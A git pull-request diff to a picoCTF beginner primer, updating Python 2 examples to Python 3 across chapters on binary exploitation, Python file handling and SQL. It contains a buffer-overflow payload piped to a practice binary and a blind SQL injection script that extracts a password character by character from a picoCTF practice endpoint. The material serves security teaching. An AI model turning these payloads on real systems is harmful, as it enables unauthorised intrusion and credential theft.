Merge pull request #17 from arnavm30/master

More python updates, also resolved issue #16

chapters/binary.adoc

@@ -119,12 +119,12 @@ HelloPicoCTF
 The program did what it was written for. Now, we are going to send a particular string to the program using python. You can run a single line of python in the command using the flag -c, and enclosing the line of code between single quotes. In the terminal you can pass the output of one command as the input to other command using the pipe, which is this character "|". In the following command we are printing something in python, and passing that to the C program we just compiled.
 
 [source, python]
-python -c 'print "hello world!" ' |./v1
+python3 -c 'print("hello world!")' |./v1
 
 You should see "hello world!" printed back to the terminal right after the command. Note that in python you can  repeat the same character if you multiply it by a number, so 128*"@" is simply a string composed by 128 "@" repeated. For example if you run:
 
 [source, python]
-python -c 'print 10*"@"'
+python3 -c 'print(10*"@")'
 
 You should see the output:
 
@@ -134,7 +134,7 @@ AAAAAAAAAA
  Now we are going to send a string that is composed by 128 characters repeated, concatenated to some bytes.
 
 [source, python]
-python -c 'print 128*"@"+"\x20\xe0\xff\xff\xff\x7f\x00\x00\xb7\x05\x40\x00"' |./v1
+python3 -c 'print(128*"@"+"\x20\xe0\xff\xff\xff\x7f\x00\x00\xb7\x05\x40\x00")' |./v1
 
 As result you will see:
 

chapters/python.adoc

@@ -383,12 +383,12 @@ Save the file. Now, in the same folder, create a program with the following code
 
 [source, python]
 filepath = "pico.txt"
-cnt = 1
+i = 1
 with open(filepath, "r") as my_file:
     for line in my_file:
-        print(cnt)
+        print(i)
         print(line)
-        cnt += 1
+        i += 1
 
 [source, python]
 You should see the following output when you run the program:
@@ -418,26 +418,26 @@ If you want to save your output in another file, you can easily do it in the fol
 [source, python]
 filepath_read = "pico.txt"
 filepath_write = "outputpico.txt"
-cnt = 1
+i = 1
 with open(filepath_read, "r") as file_read:
     with open(filepath_write, "w") as file_write:
        for line in file_read:
-            file_write.write(str(cnt) + "\n")
+            file_write.write(str(i) + "\n")
             file_write.write(line + "\n")
-            cnt += 1
+            i += 1
 print("look inside your folder...")
 
 We introduced some new concepts in this code. This:
 
 [source, python]
-str(cnt)
+str(i)
 
 Is a cast from an integer to string. We want to convert that integer into a string to be able to concatenate two strings. For example, if we have the string "hello" and the integer 123, and we want to create a string that is "hello123", we can concatenate those two values. But first, we need to convert the integer to string, otherwise python will show an error. To concatenate strings, we use the operator '+'. When we add two strings, python will concatenate them. When we add two integers, python will do a mathematical addition. To represent a break of line in a string, we use "\n".
 
 After this explanation, you should know that this:
 
 [source, python]
-str(cnt) + "\n"
+str(i) + "\n"
 
 Simply converts an integer to string, and then we concatenate a break line to it. We do that, because the function line write() does not add a breakline to the string after it writes it, so we would have a file with a single huge line of text if we don’t do that. When you run the code, you should see no output in the terminal, but if you show the contents of the folder you are in, you should see a new file called 'outputpico.txt'. If you show the contents of that file, you should see the following:
 

chapters/sql.adoc

@@ -238,18 +238,18 @@ You could possibly find the whole password manually, but it would take too much
 [source, python]
 import requests
 from string import printable
-accum=""
+accum = ""
 for i in range(40):
   for letter in printable:
-    accum+=letter
+    accum += letter
     r = requests.post("http://primer.picoctf.com/vuln/web/blindsql.php?&username=WeDontCare&password=' or '"
     + letter+"'=( select substr(binary password,"+str(i)+",1) from pico_blind_injection where id=1 ) and ''= '")
     if 'NOTHING FOUND...' in r.text:
-      accum=accum[:-1]
-      print "nope"
+      accum = accum[:-1]
+      print("nope")
     else:
-      print "We found the character: "+letter
-print accum
+      print(f"We found the character: {letter}")
+print(accum)
 
 
 This script is just one of the many ways in which a blind SQL injection is done. With your knowledge of Python and SQL, you should be able to understand the script if you read it carefully. Note the following: